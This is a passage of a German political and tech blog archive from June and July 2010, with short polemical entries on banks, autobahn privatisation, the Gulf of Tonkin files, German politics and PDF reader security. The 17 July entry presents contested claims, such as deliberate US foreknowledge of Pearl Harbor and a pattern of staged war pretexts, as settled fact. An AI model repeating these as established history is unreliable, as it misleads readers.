Damals. Heute haben sie nochmal draufgeguckt, was aus den Kids geworden ist, und das Ergebnis ist, dass die Tests in den Schulen zwar gesagt haben, dass die gleich gut entwickelt sind, aber dass die Kids mit den guten Kindergartenlehrern mit höherer Wahrscheinlichkeit zur Uni gingen, mehr verdienten, weniger häufig alleinerziehende Eltern wurden, und mehr Geld für die Rente zurücklegten.

Mon Jul 26 2010

[l] Goldman Sachs zahlt 550 Millionen Dollar Strafe wegen Irreführung ihrer Investoren. Das wird sich aber bemerkbar machen in der Portokasse!
Oh und wo wir gerade bei Goldman waren: die haben auch gerade angesagt, was sie mit der AIG-Bailout-Kohle gemacht haben: an ausländische Banken verteilt. Goldman hat nämlich im Herbst 2008 $5,55 Milliarden Dollar für ihre AIG-Investments gekriegt, gegen deren Ausfall sie sich aber schon abgesichert hatten mit den besagten ausländischen Banken. Insgesamt hat GS 12,9 Milliarden Dollar AIG-Bailout gekriegt.

Sun Jul 25 2010

[l] Es gibt noch ein paar Updates zu Alternativlos. Es gab Feedback, dass ihr pro Sendung einen flattr-Button haben wollt, nicht nur einen allgemeinen. Das war eh angedacht, jetzt haben wir es gemacht.
Nachdem die Alternativlos-Seite eher lahm lud, vor allem weil sie immer auf Flattr gewartet hat, um den Button zu laden, habe ich das jetzt umgestellt. Der Button selbst ist jetzt statisch und kommt von unserem Webserver. Das hat auch den Datenschutzvorteil, dass flattr euch nur sieht, wenn ihr was flattrt, und nicht auch alle vorbeilaufenden User mitkriegt.
Drittens kam die Bitte, jeweils zu den Sendungen ein paar Links mit weiterführenden Informationen zu veröffentlichen. Das ist eine gute Idee, hatten wir auch geplant, aber dann verpeilt. Wir geloben Besserung.
Oh, übrigens: weil Leute gefragt haben, wo unsere großartige Titelmusik herkommt: von hier.

Tue Jul 20 2010

[l] Erinnert ihr euch noch an den Ärger, mit dem sie alle Google überhäuft haben, weil sie für Streetview WLAN gesnifft haben? Dabei macht Apple das seit Jahren, und zwar nicht nur auf Mobiltelefonen, sondern auch auf Desktops.
Und, äh, mal unter uns: nicht nur Apple. Auch Android macht Location Detection via WLAN. Das ist sozusagen Standard.
Gut, Google hat auch die Inhalte gesnifft, das ist noch mal ein zusätzlicher Schritt. Aber wenn ich hier lese,
Am 21. Juni hatte Apple eine aktualisierte Fassung seiner Datenschutzrichtlinien veröffentlicht. Wer ihr zustimmt, räumt Apple das Recht ein, seine Positionsdaten zu speichern und an Partnerunternehmen weiterzugeben.
… das riecht auch nicht gerade gut.
Vermutlich beißt sich Google gerade in den Arsch, dass sie das aus ihren Autos gemacht haben und nicht über Android Crowdsourcing.
[l] Achtung, nicht auf nüchternen Magen lesen: Unsere Autobahnen sind an Firmenkonglomerate verpachtet worden. Nur dass die nicht zahlen. Im Gegenteil. Die reparieren die Autobahnen und bezahlen Sommer- und Winterdienst, und dafür kriegen sie die Mauteinnahmen. Für 30 Jahre. Wieviel das konkret ist, ist geheim. Der Artikel beschreibt, wie ein Grünen-Abgeordneter das mal recherchieren wollte, und wie sie den abkanzeln und am Ende ihm nur Details in einem Geheimraum zeigen, wenn er sich verpflichtet, das keinen Dritten zu sagen, also nicht seinen Wählern, nicht seinen Parteikollegen, nicht anderen Abgeordneten.
Und wie nicht anders zu erwarten, beteiligen sich die üblichen Verdächtigen an der Chose. Ich zitiere mal ein paar Schlagzeilen aus der Lokalpresse, die die "Zeit" auch zitiert:
Neu asphaltierte Autobahn voller Schlaglöcher; Bröselautobahn setzt Bilfinger zu; Rasanter Anstieg von Unfällen auf A1; Die Spur des Schreckens; Horror-Unfall auf der Horror-Autobahn.
Mhh, Bilfinger, Bilfinger… da war doch was.
Ist ja auch klar, wenn es sich um privatwirtschaftliche Firmen handelt, dann haben die kein Interesse daran, in 30 Jahren eine sanierte Straße zu übergeben. Die wollen in der Zeit so viel Profit wie möglich da raustragen, und sonst nichts. Dementsprechend gibt es auf der A1 seit der Privatisierung häufiger als zuvor:
Schnitt krachte es jeden Tag 4,3-mal zwischen Hamburg und Bremen. Das sei gegenüber 2008, dem Jahr vor dem Baubeginn, eine Steigerung um 121 Prozent, sagt Radtke. 121 Prozent – irgendetwas muss hier extrem schieflaufen.
No Shit, Sherlock! Und was für Unfälle sind das so?
Lastwagen rasieren die Außenspiegel von Pkw ab, weil die Fahrspuren zu eng sind, und die Lasterfahrer merken es oft nicht einmal.
Weil die Fahrspuren zu eng sind?! Teil des Deals war, die Autobahnen sechsspurig auszubauen. Ob die da einfach die Spuren dünner gemacht haben? Erinnert ein bisschen an "That's not my department, says Wernher von Braun".
Aber nicht nur Sachschäden sind nach oben gegangen, auch Todesfälle.
Zwar ist es keine Besonderheit der A1, dass dort, wo Baustellen eingerichtet werden, die Zahl der Unfälle in die Höhe schnellt. Aber auf der A1 ist das Risiko besonders hoch. Man merkt der Baustelle an, dass sie möglichst billig und schnell abgeschlossen werden soll. Deshalb ist sie so gefährlich.
Also DA konnte ja wohl NIEMAND mit rechnen!1!!
Und mal so als Zahlen, wie dünn die Spuren sind: die Hauptspur ist 3m breit, die Überholspur 2m. Eine Daimler E-Klasse ist mit Spiegeln 2,09m breit.
Sie haben auch mal unseren Verkehrsminister Ramsauer dazu befragt, ein CDU-Neocon-Hardliner, wie er im Buche steht, der dazu folgendes meinte:
Der Minister ist überzeugt davon, dass die Privaten schneller bauen, weil sie effizienter seien. Für den Staat sei das erheblich billiger, sagt er, und nach einer kurzen Pause fügt Ramsauer hinzu: »Da bin ich anderer Meinung als der Bundesrechnungshof.«
Ist das nicht großartig? Meinung? Ernsthaft? Meinung? Wir reden von Geld, der Mutter aller quantifizierbaren Maßeinheiten. Und er entscheidet da nicht anhand von Fakten sondern anhand von Meinungen?!? Die Zeit zitiert auch die Argumentation des Rechnungshofes, die mir spontan einleuchtet. Lest euch das mal durch. Boah kriegt man da schlechte Laune.
[l] Ich hatte ja kürzlich mit Daniel eine Chaosradio-Sendung über Netzpolitik-Thesen des CCC gemacht, und wir hatten angekündigt, dass der CCC da auch mal eine Presseerklärung machen würde. Jetzt ist es soweit. Seit der Sendung sind die noch ein bisschen umformuliert und anders gegliedert worden. Also, lest euch das mal durch, und kommentiert es in euren Blogs. Wir müssen da mal eine konstruktive Diskussion an den Start kriegen, so geht das nicht weiter, dass die Bertelsmannstiftung unsere Zukunft bestimmt.

Sat Jul 17 2010

[l] Frisch befreite Akten zum Golf of Tonkin Incident zeigen, dass die NSA-Offiziere da angeblich abgehörte Kommunikation schlicht gefälscht haben. Falls das jemandem nichts sagt: Das war der Anlass/Auslöser/Vorwand für den Vietnam-Krieg. In einer langen Reihe von hinterhältigen Angriffen auf die friedliebenden Amerikaner, die sich dann genötigt sahen, zur Verteidigung ihrer selbst und der Welt an sich zurückzuschlagen, reiht sich das historisch schön ein. Das ist eben der Amerikanische Weg, Kriege zu führen. Nun kann man sich fragen, was die Lusitania dort zu suchen hatte, und bei Pearl Harbor ist ja inzwischen bekannt, dass die Amerikaner von dem Angriff vorher wussten, aber den Truppen vor Ort nichts gesagt haben. Das wäre ja auch der Legendenbildung nicht zuträglich gewesen, wenn es da keine Opfer gegeben hätte. Je weniger das Volk Lust auf Krieg hat, desto mehr Opfer muss es geben. Und im Koreakrieg hatten die Amis schon vor Kriegsausbruch Truppen nach Südkorea verlegt. Das klingt für mich, als hätten die Nordkoreaner nicht aus heiterem Himmel unprovoziert angegriffen, aber hey, die Geschichtsbücher werden vom Sieger geschrieben und sehen das anders. 9/11 als Auslöser für den Irakkrieg passt auch prima in die Reihe.
Und der Golf von Tonkin ist eben der offizielle Vorwand für den Vietnamkrieg gewesen. Die Amerikaner hatten Abhörschiffe losgeschickt, die die Nordvietnamesen ausspionieren sollten. Der Krieg ging dann los, als die Boote meldeten, sie würden von diversen Torpedos angegriffen. Später hat man dann keinerlei Hinweise auf tatsächliche Torpedos gefunden und das ist zu einer Sensor-Fehlfunktion umdeklariert worden, weil "wir haben gelogen, um einen Krieg führen zu können" ja auch eher peinlich ist.
Und was jetzt eben rausgekommen ist, ist dass auch die von diesem Boot gemeldeten "abgefangenen Funksprüche" erstunken und erlogen waren. Schon damals gab es direkt Zweifel an der Geschichte, ob die wirklich angegriffen worden seien. Die erfundenen Funksprüche "bestätigten", dass Vietnam Torpedos geschossen hatte.
Mr. Hanyok concluded in 2001 that N.S.A. officers had deliberately falsified intercepted communications in the incident to make it look like the attack on Aug. 4, 1964, had occurred, although he said they acted not out of political motives but to cover up earlier errors.
Das ist aber an sich nicht der neue Teil, wie da schon steht, das ist von 2001. Neu sind die anderen Dokumente, mit denen sie belegen wollen, dass Congress und Senate sich die Entscheidung nicht leicht gemacht haben, ob sie auf Basis dieser Lügen einen Krieg gegen Vietnam führen sollen oder nicht. Im Grunde wußten sie, dass sie gerade verarscht werden, aber offensichtlich wollten sie echt gerne mal wieder Krieg führen, und haben daher nicht weiter nachgefragt.
[l] WTF?!? Guckt mal, wie die Lufthansa-Lobbyisten das Flugsteuergesetz kaputtgemacht haben:
Lufthansa-Chef Wolfgang Mayrhuber hat erreicht, dass Umsteigepassagiere und seine Frachtsparte von der geplanten Abgabe ausgenommen werden.
Soll das ein Witz sein?!? Also wenn es nach mir ginge, würde ich genau hier ein Exempel statuieren. Herausfinden, wer für diese Änderungen zuständig war, und die nicht nur feuern, sondern öffentlich an den Pranger stellen. Die sollen nie wieder einen Job in einem Ministerium oder eine Behörde kriegen. Was für eine dreiste Frechheit.

Thu Jul 15 2010

[l] Nachdem ich mich über die Homöopathie-Bemühungen der Nazis lustig gemacht habe, muss ich auch mal auch die Welteislehre aufmerksam machen. Das ist ja mein persönlicher Favorit für die bizarrste Theorie, die die Nazis in ihrem Rassenwahn der Realität vorziehen wollten, weil sie keine von Juden kommenden Theorien ertragen konnten.

Wed Jul 14 2010

[l] Oh und einen noch zur Homöopathie: Ratet mal, wer das hoffähig gemacht hat. Kommt ihr nie drauf!
Die Nazis wollten der "verjudeten Schulmedizin" die Homöopathie entgegensetzen. Eine Überprüfung der "neuen deutschen Heilkunde" führte jedoch zu katastrophalen Ergebnissen - Homöopathen befänden sich in einer Dauerhypnose, resümierte am Ende der Studienleiter.
Bwahahaha (Danke, Bastian)

Tue Jul 13 2010

[l] Die Schmutzkampagne gegen Wikileaks zeigt erste Erfolge. Die Wau-Holland-Stiftung, die die Spenden gesammelt hat für Wikileaks, hat eine Erklärung herausgegeben, was mit den Geldern gemacht wurde. Und es sieht ungefähr so aus, wie man sich das vorgestellt hat: bislang nur 10% ausgezahlt, und die Kohle ging für Reisekosten, Computerhardware (für Server) und Internet-Connectivity raus.
"Geld gibt es von uns nur gegen Ausgabebeleg. Wir zahlen den Wikileaks-Leuten kein Gehalt, keine Honorare, keine Tagessätze und nicht einmal die Spesenpauschalen wie sie im deutschen Steuerrecht vorgesehen sind"
Ich bin ja traurig, dass sich der Freitag für diese Kampagne hergegeben hat.

Sun Jul 11 2010

[l] Erinnert ihr euch daran, als der Bush einen Fox News "Journalisten" zu seinem Pressesprecher gemacht hat, und wir alle darüber gelacht haben, dass die nicht mal mehr so tun, als seien das unabhängige Nachrichten? Nun, bei uns läuft das nicht anders:
Steffen Seibert, Nachrichtenmann beim ZDF-Flaggschiff heute-journal, wird er Kanzlerin und ihre Regierung künftig in der Öffentlichkeit vertreten.
Das ZDF ist ja von der CDU gegründet worden, weil ihnen die ARD zu unabhängig war und es gewagt hat, die CDU zu kritisieren. Heute sieht man, dass sich das ZDF seit damals nicht sonderlich weit von der CDU wegbewegt hat.
Update: Siehe auch. (Danke, Felix)

Sat Jul 10 2010

[l] Wollt ihr wissen, wer bei BP seit Anfang des Monats die Krisen-PR macht?
Ich sage euch, das passt mal wieder wie Arsch auf Eimer!
Kommt ihr nie drauf!
Anne Womack-Kolton. Und jetzt guckt mal, was die vorher gemacht hat:
Press Secretary to the Vice President at Bush Cheney 2004
Darauf genommen bin ich bei diesem Rant von dem Typen hinter dem BPGlobalPR Twitter-Account. Den Rant kann ich euch auch nur ans Herz legen. Sehr schön.

Wed Jul 7 2010

[l] So, ich habe mal die Werbung wieder ausgemacht. Da ist jetzt erstmal genug Kohle reingekommen, und ich hatte ja gesagt, dass das ein Pilot ist.
Vielleicht gibt es zur Weihnachtszeit wieder eine Werbeaktion, mal gucken. Herzlichen Dank an alle, die da was gekauft haben!

Mon Jul 5 2010

[l] So, komme gerade von der LKA-Zeugenvernehmung zurück. Es ging, wie schon vermutet, um das Bild hinter diesem Eintrag. Das Bild habe ich inzwischen weggemacht, weil mir die Kriminaloberkommissarin das dringend angeraten hat. Da ich den Inhalt eh praktisch komplett im Text abgetippt hatte, ist das aber auch kein großer Verlust. Highlights der Zeugenvernehmung: sie hätte das inhaltlich auch nicht für eine Fälschung gehalten, aber offenbar war das Logo der Polizei Thüringen falsch, daran hätte man erkennen können, dass das nicht echt ist. Die Ermittlung war gegen unbekannt wegen Amtsanmaßung. Meinem Rechtsverständnis nach hätte ich das Bild auch im Netz lassen können, aber hey, das ist mir jetzt den Stress nicht wert in den heißen Sommermonaten.
Die für mich interessanteste Frage an der ganzen Chose war ja, ob ich mich als Blogger auf Quellenschutz berufen kann. Da konnte sie mir auch nicht helfen. Sie erklärte mir, dass ich im wesentlichen die Aussage mit Hinweis auf den Quellenschutz verweigen könne bei ihr, und dann geht das zur Staatsanwaltschaft, und die prüft das dann, ob ich das tatsächlich machen kann. Schade, da hatte ich mir eine klarere Aussage erhofft.
Inhaltlich konnte ich denen nicht weiterhelfen. Das Bild hat mir damals jemand per Mail geschickt, das war vor über einem halben Jahr, so lange hebe ich meine Emails nicht auf. Und weil da kein "Danke, [Name]" dranstand, konnte ich auch noch zu Protokoll geben, dass die Mail von einem Wegwerfaccount bei einem Freemailer mit einem fiktiven Namen gekommen sein wird. Ich frage noch vorsichtig an, ob die wirklich glauben, nach vier Jahren den Verfasser eines Anschlages an einer Uni in Thüringen ermitteln zu können. Sie zeigte sich auch eher zurückhaltend enthusiastisch bezüglich der Aufklärungswahrscheinlichkeit :-)
Aber ich bin jetzt doch neugierig. Vielleicht liest ja hier ein Anwalt für Presserecht mit und mag mir das mal kurz erläutern mit dem Quellenschutz. Mein Eindruck ist, dass ich ein Journalist bin und damit die Aussage verweigern kann. Wenn dem eurer Meinung nach nicht so ist: warum nicht? Was fehlt? (Danke, [Name])

Sat Jul 3 2010

[l] In den 90er Jahren haben US-Senatoren am Aktienmarkt 12% mehr als der Markt gemacht, während Business-Insider 6% mehr und normale Bürger gar 1,4% weniger eingefahren haben.

Thu Jul 1 2010

[l] Habt ihr die Antrittsrede von Wulff gehört? Ich nicht. Aber ich höre gerade, dass er bis zum dritten Satz ausgehalten hat, bevor er den Bürgern ins Gesicht gelogen hat, was für eine tolle freie und nur dem Gewissen verpflichtete Wahl das doch war, die ihn gewählt hat.
Das ist natürlich auch kognitive Dissonanz. Der wäre halt gerne frei und nur dem Gewissen verpflichtet gewählt worden :-)
Übrigens gibt es Gerüchte, dass unter den Dissidenten auch amtierende Minister waren, weil die Merkel sich da gerade echt Feinde gemacht hat mit dem Sparpaket. Keine Ahnung, wieviel da dran ist. Aber die Vorstellung gefällt mir.
[l] Guckt euch mal den Lizenzdeal an, den die RWTH Aachen mit Microsoft geschlossen hat. Die zahlen pro neu angeschafftem Rechner 95 Euro bei Windows-PCs, 55 Euro für Macs, und … 10 Euro für Linux-Rechner. Money Quote:
Die "Missionierung" ist ausdrücklich KEIN Ziel des Vertrages.
Na dann haben wir ja nochmal Glück gehabt!
Und die RWTH ist da nur eine von vielen Unis, die das so macht. Seit ich an der Uni war, scheint sich MS da mehr als breit gemacht zu haben. Active Directory, Exchange, Sharepoint *grusel* (Danke, Matthias)
[l] Zu dieser Präsidentenwahl gestern… ich finde, der Wulff ist der perfekte Präsident. Der vereint genau alle Merkmale Deutschlands auf sich, an die die Bevölkerung nicht erinnert werden möchte, aber sollte. Jemand, der mit gestärkten Oberhemden mangeldes Rückgrat ausgleicht. Das haben wir verdient, dass jetzt so jemand unser Präsident wird.
Aber wichtiger als wer es geworden ist finde ich, wer es nicht geworden ist. Ich rechne es der Linkspartei hoch an, dass die nicht für Gauck gestimmt haben. Lieber enthalten als für einen Neocon und INSM-Handlanger.
Ich persönlich halte Gauck für einen Überzeugungstäter. Der glaubt, er tut das richtige. Das ist deutlich gefährlicher als ein Mann ohne eigene Position wie Wulff, der ist immerhin halbwegs berechenbar.
Gibt es eigentlich schon Ansagen, wer jetzt Ministerpräsident in Niedersachsen wird? Der Schünemann vielleicht? BWAHAHAHAHAHA
Update: Nicht Schünemann, David McAllister. Der ist mir bisher noch nicht aufgefallen. Mal gucken, wie der so ist. Ihr könnt euch ja mal durch seinen Flickr-Stream durchklicken. Das Hochzeitsfoto im Kilt zeigt zumindest, dass er Stil hat. Und schlimmer als Wulff erscheint mir gerade unwahrscheinlich, auch wenn das Bild hier einen starken Magen braucht. Der Mann hat übrigens Wulffs Wahlkampf 2003 gemacht, und Wulff damit den Ministerpräsidentenposten beschafft. Hier ist ein Lebenslauf.
[l] Der Adobe-Fix für das PDF-Launch-Problem fixt das Problem nicht. Und DAFÜR haben die jetzt Monate gebraucht?!?
Übrigens, wo wir gerade bei PDF waren. Es gibt da noch eine PDF-Render-Engine, Open Source sogar, die ich noch gar nicht auf dem Radar hatte: MuPDF, von Artifex, den Ghostscript-Leuten. Das Viewer-Programm ist vom Bedienungskomfort nicht mit anderen Readern mithalten, unterstützt z.B. keine Textmarkierung oder Suche, aber ist schön schnell, die Ghostscript-Leute wissen im Allgemeinen auch, was sie tun, und zum Angucken reicht es. Für Windows hat jemand aus der Library ein schöneres Frontend gemacht, der wohl auch markieren und suchen kann (hab ich noch nicht probiert). Das Frontend fühlt sich auch deutlich flotter an als die Unix-Version, weil er die nächste Seite jeweils schonmal vorher rendert, damit das Umblättern dann zackig geht.
Nur die Engine müsste mal jemand auditieren. Die ist relativ klein. Müßte halt mal jemand. Mal schauen, vielleicht in einer lauen Sommernacht…
Übrigens: mupdf macht echte Subpixel-Auflösung und sieht daher gerade bei mit TeX gesetzten Sachen besser aus als xpdf-basierte Programme wie xpdf, kpdf, und poppler-basierte Lösungen wie evince.
Oh und noch was: Foxit. Ich traue denen nicht. Nicht weil ich einen konkreten Grund hätte. Aber es ist nicht Open Source, und ich habe keinen Grund, denen zu trauen. Daher macht auch ein Umstieg von Adobe nicht viel Sinn, aus Sicherheitsaspekten, denn die stehen immerhin zu ihren Bugs und fixen sie irgendwann und dann gibt es auch ein Advisory. Foxit fixt alle Jubeljahre mal was, und das sind dann Klopper wie die Launch-Sache. Wenn jemand wirklich auf Security achtet, implementiert er das gar nicht erst so, dass da wild Dinge ausgeführt werden.
[l] So, Sendung ist vorbei, uns hat es Spaß gemacht. Euch hoffentlich auch :-)
Weil immer wieder Leute vorschlagen, dass wir doch mal keine Hörer reinnehmen, weil da immer solche Spacken anrufen: das ist keine Option. Das ist der "Blue Moon" Slot bei Fritz, das ist per Definition eine Sendung, bei der Hörer anrufen. Das ist Talk Radio. Wir stellen da nicht die Regeln auf, wir sind nur Gäste.
Zweitens ist das ja auch eine Stärke, dass das eine Mitmach-Sendung ist. Wenn ihr die Anrufer doof findet, dann ruft doch selber an, und macht es besser. Wir sagen ja vorher, worum es geht. Überlegt euch ein kurzes Statement, am besten eine Minute oder weniger. Macht es ein Statement, das spannend ist, und nicht offensichtlich. Wir nehmen da immer Hörer rein, und können nur selektieren, wenn wir da mehr Anrufer als Zeit haben. Und auch dann versuchen wir, alle kurz reinzunehmen. Da müsstet ihr also als Sekundäreffekt auch noch das Niveau heben durch eure Statements, damit Leute ohne Niveau keinen Bock mehr haben und auflegen.
Wichtiger wäre mir persönlich aber, dass ihr die Zeit bei blöden Anrufen nutzt, um mal über das Gesagte zu reflektieren. Das soll ja keine Beschallung werden sondern zum Nachdenken anregen. Und wenn euch ein schlauer Gedanke kommt, dann könnt ihr ja auch anrufen und uns teilhaben lassen.
Wir haben auch ein Format ohne Anrufer, das ist dann ein reiner Podcast: Chaosradio Express. Thematisch durchaus verwandt aber doch breiter gestreut, und auch ohne Zeitbegrenzung. Wenn ihr da noch nie reingehört habt, könnt ihr es ja jetzt mal tun. Viel Spaß!

Tue Jun 29 2010

[l] Seht ihr, Loben funktioniert! Sehr gut gemacht, liebe FDP! Weitermachen!
[l] Spionage-Update: Der Libanon hat einen israelischen Spion verhaftet und das FBI hat einen russischen Spionagering ausgehoben. In beiden Fällen sind das natürlich bisher nur Anschuldigungen.
Der Libanon hatte letztes Jahr eine spektakuläre Aktion gemacht, bei der sie Dutzende von israelischen Spionen enttarnt haben. Es gab da Spekulationen, dass die Russen ihnen geholfen haben.
Zu dem FBI-Fall hat das ehemalige Nachrichtenmagazin mehr Details.

Fri Jun 25 2010

[l] Bug der Woche: Pythons SSL-Modul war immer so langsam. Stellt sich raus, dass die ein Debug-Flag gesetzt haben, das immer sleep(1) gemacht hat bei SSL_read und SSL_write. (Danke, Richard)

Thu Jun 24 2010

[l] Das Hardwaredesign des Iphone 4 hat anscheinend das Problem, dass man nur ordentlich Deckung kriegt, wenn man das Telefon nicht in die Hand nimmt. Aber was ein echter Apple-Fanboi ist, der findet sogleich eine Rationalisierung, wieso man damit leben kann:
By appearances, the act of holding the phone impares signal strength. I'm not so bothered because I typically use a Bluetooth headset rather than hold a phone.
Genau. Wenn euch das betrifft, dann seid ihr selber Schuld. Keinesfalls hat Apple einen Fehler gemacht, hört ihr?
Update: If I hold the phone out from my palm, but sill firmly gripped, the number of bars diminishes only slightly.
[…]
Otherwise, my initial reaction to iPhone 4 is favorable.
Update: Apples Werbung zeigt hilfreicherweise, wie man das falsch hält.
Update: Der Fix scheint relativ einfach zu sein.

Wed Jun 23 2010

[l] Obama feuert General McChrystal. Damit hat Obama sich m.E. keinen Gefallen getan. Petraeus soll übernehmen. Das ist der, der schon im Irak vor sich hin verliert.
Das letzte Mal, als ein US-Präsident im Krieg den zuständigen General gefeuert hat, das war im Koreakrieg. Das war Präsident Truman. Das hat die Sache damals nicht besser gemacht, und wird sie auch heute nicht besser machen.
Vielleicht könnte man argumentieren, dass Obama keine Wahl gehabt hat, aber das glaube ich auch nicht. Erstens Mal gibt die Presse gerne mal Statements aus dem Kontext gerissen wieder und baut darum eine Geschichte, die die Dinge falsch darstellt. Zweitens muss der ja seinen Soldaten gegenüber vermitteln, dass er im Zweifelsfall ihren Arsch retten wird. Das ist seine Aufgabe als General. Insofern wäre es von Obama souveräner gewesen, den jetzt nur öffentlich abzuwatschen. Und es wäre für die Truppen vor Ort der klare Hinweis gewesen, dass der General wirklich ihren Arsch rettet im Zweifelsfall. Jetzt wird die ohnehin beschissene Moral noch schlechter werden. Immerhin werden da alle Nase lang NATO-Soldaten von Bomben zerfetzt. Nicht, dass bei dem Krieg eine erwähnenswerte Restwahrscheinlichkeit da war, dass die Amis da "gewinnen" können, aber jetzt ist sie mit Sicherheit Null.
Im Übrigen hätte Obama Gelegenheit gehabt, sich von dem schlecht laufenden Krieg zu distanzieren, das später den Militärstrategen in die Schuhe schieben können. Jetzt hat er das offiziell zur Chefsache gemacht und damit ist auch er Schuld, wenn es nicht gut läuft. Und das tut es nicht.
[l] Falls sich noch jemand fragt, wieso der Euro fallen musste: Hier steht es. Mit Griechenland hat das nichts zu tun. Die sind nur unser Sündenbock.
Die deutschen Autohersteller erleben unerwartet ein Sommermärchen: Um den plötzlichen Ansturm der Kunden zu bewältigen, fahren Daimler, BMW und Audi massiv Sonderschichten.
Haha, Sommermärchen. Plötzlicher Ansturm. Da konnte NIEMAND mit rechnen!1!!
Das war eine abgekartete Sache und eh völlig klar. Um das mal zu illustrieren: Sogar das ehemalige Nachrichtenmagazin sah das im Februar schon kommen. Das war so klar, dass George Soros auf den Absturz des Euro gewettet hat. Das für mich schockierende an der ganzen Chose ist bloß, dass es tatsächlich funktioniert. Die Fundamentalwerte in den USA haben sich keinesfalls verbessert. Die sind immer noch alle hochverschuldet und schieben ihre Schulden von einer Kreditkarte auf die andere. Und trotzdem, sobald die deutschen Autos billiger werden, kaufen sie sich welche. Auf die Dämlichkeit der Amis ist halt Verlass. Ich frage mich nur, ob die Autohändler schlau genug sind, die Finanzierungsangebote für ihre Autos so zu strukturieren, dass sie am Ende nicht auf dem Risiko sitzen, wenn die Leute alle ihre Schulden nicht mehr abzahlen können. Ich nehme mal an, dass die sich ordentlich rückversichert haben. Das wäre jedenfalls meine erste Priorität, wenn ich an deren Stelle wäre.
Bei aller Freude über die steigenden Exporte möchte ich aber auch auf meine Argumentation von 2008 hinweisen. Mehr Exporte heißt nicht, dass beim Volk mehr Geld ankommt.
Die bemühen sich jetzt halt, das Karussell weiterdrehen zu lassen. So haben wir das immer gemacht, wo machen wir das auch weiter!1!!
Wobei ich ja schon mal sagen muss, dass, so offensichtlich das jetzt alles aussieht, ich doch schockiert bin. Das hätte ich letztes Jahr nicht gedacht, dass die ganze EU den Euro runtertreiben würde. Das ist schon ein Zeichen, dass es um unsere Fundamentalwerte gerade sehr schlecht bestellt ist. Ich dachte letztes Jahr noch, dass der Euro nicht so stark sinken können würde, weil die Länder alle durch den Stabilitätspakt gefesselt sind. Das hielt ich für unwahrscheinlich, dass sich dann eben alle einigen, den Euro gemeinsam abzuschießen. Schließlich geht es bei der EU ja nicht um Zusammenarbeit und Einigkeit :-)
Und genau das war der Bailout. Ein konzertierter Euro-Abschuss. Und wenn das so gut funktioniert, wie es jetzt aussieht, dann werden wir auch noch Spanien "retten". Und ihr werdet euch ja sicher schon überlegt haben, was Griechenland und Spanien mit der Bailout-Kohle machen. Ihre Gläubiger aus Deutschland auszahlen. Und so bleibt alles in der Familie.

Tue Jun 22 2010

[l] Apple hat IPv6 kaputt gemacht, genauer ihren DNS. Im Ergebnis tut IPv6 nicht mehr. Es gibt keine gutartige Erklärung dafür. Die haben einfach mal wieder großflächig verkackt.
Popcorn! (Ist von Oktober 2009. Keine Ahnung, ob das noch aktuell ist)
Update: Anscheinend ist das noch aktuell.

Fri Jun 18 2010

[l] Und deshalb sind Lobe wichtig, liebe Leser! Die FDP hat sich von meinem Lob motivieren lassen und weitergemacht! \o/ (Danke, Nathanael)
[l] Überraschung der Woche: Die Nordkoreanische Mannschaft vermisst schon vier Spieler. Die werden sich wohl aus dem Staub gemacht haben :-)

Thu Jun 17 2010

[l] Hier vertritt jemand die Position, dass die das mit dem Öl im Golf von Mexiko nicht stoppen können. Und er leitet das her aus den Aktionen von BP. Er meint, sie haben das oben zugemacht, und dann kam das Öl halt woanders raus. Das heißt, dass man nur mit Relief Wells weiterkommt, was ja eh praktisch von Anfang an klar war, aber was eben nicht so mal eben schnell geht, daher der Aktionismus die ganze Zeit.

Thu Jun 10 2010

[l] Das Verfassungsgericht hat den Eilantrag gegen den Euro-Bailout abgewiesen. Das ist noch nicht der Hammer. Der Hammer ist die Begründung:
Seinen Beschluss begründete der zweite Senat mit den Folgen, die ein vorläufiges Verbot deutscher Bürgschaftszusagen für den Euro haben könnte.
Krasse Kacke! Geht noch weiter:
Würde die Bundesrepublik Deutschland ihre Zusagen zum Rettungspaket auch nur vorübergehend aussetzen müssen, könnte dies nach Einschätzung der Bundesregierung zu einer Vertrauensminderung an den Märkten führen, deren Folgewirkungen nicht absehbar seien.
Wenn die Märkte gefährdet ist, ordnen sich Recht und Gesetz unter?! Ganz so übel ist es nicht, die haben ja nur den Eilantrag abgewiesen, die eigentliche Sache wird schon noch verhandelt. Aber dann ist es zu spät, etwas zu tun.
Ich interpretiere das so, dass wir jetzt unter einer Art Notstandsgesetz arbeiten. Vor allem nehme ich jetzt an, dass die Lage noch deutlich übler ist, als sie bisher zugegeben haben.
Update: Hier ist die Presseerklärung des Verfassungsgerichtes. Ich muss mich hier gerade von einem befreundeten Anwalt beschimpfen lassen, weil er findet, ich habe nicht verstanden, wie ein Eilverfahren am Verfassungsgericht funktioniert. Da sei das immer so, dass die die Konsequenzen des Urteils abwägen. Die gucken, was schlimmer ist. In dem Fall gab es die Alternativen, die 700 Milliarden sind weg, oder sie stoppen es und dafür kollabiert der Euro. Und das Gericht kam zu dem Schluss, dass es weniger schlimm ist, wenn die 700 Milliarden weg sind.
Unter dem Strich sind wir aber einer Meinung. Daraus folgt, dass die Gefahr des Euro-Absturzes deutlich größer ist als bisher angenommen, also wie ich oben schon schrieb, dass die Lage schlimmer ist als sie bisher zugegeben haben. Oder die Regierung hat dem Verfassungsgericht Sand in die Augen gestreut, das kann natürlich auch sein. Im Wesentlichen sagt die Entscheidung, dass es nicht ihre Aufgabe ist, sondern die der Regierung, solche außenpolitischen Einschätzungen zu tätigen.
Update: Ich glaube, was mich hieran am meisten stört, ist die Idee, was das für eine Hürde setzt. Die Bundesregierung lügt ja schon uns Bürgern immer dreist ins Gesicht, ihre Vorhaben seien "alternativlos". Und jetzt hat das Verfassungsgericht praktisch gesagt, wenn die von der Regierung befürchteten Konsequenzen nur bedrohlich genug sind, dann werden Eilanträge abgewiesen. Für mich als Hacker ist klar, was ab jetzt passieren wird. Die Regierung wird sich immer irgendwelche beknackten Pseudokausalketten aus dem Arsch ziehen, warum das Ende der Welt droht, wenn irgendwas ausgesetzt wird. Das haben sie ja auch bisher schon gemacht, aber da war es jeweils nur innenpolitisch. Jetzt, wenn sie nicht völlig verblödet sind, haben sie gelernt, dass sie eine außenpolitische Komponente brauchen. Denn das Verfassungsgericht hat ja klar gesagt, dass diese Abwägung Sache der Regierung ist. Die kann also selber abwägen, ob ein Eilantrag gegen sie gehört werden kann oder nicht.

Wed Jun 9 2010

[l] Merkel hat Sarkozy gemobbt. Der war zu einem Staatsbesuch geladen, und sie haben ihm ein paar Stunden vorher abgesagt, und sich nicht mal die Mühe gemacht, sich eine unglaubwürdige Ausrede aus dem Arsch zu ziehen. Peinlich, peinlich.
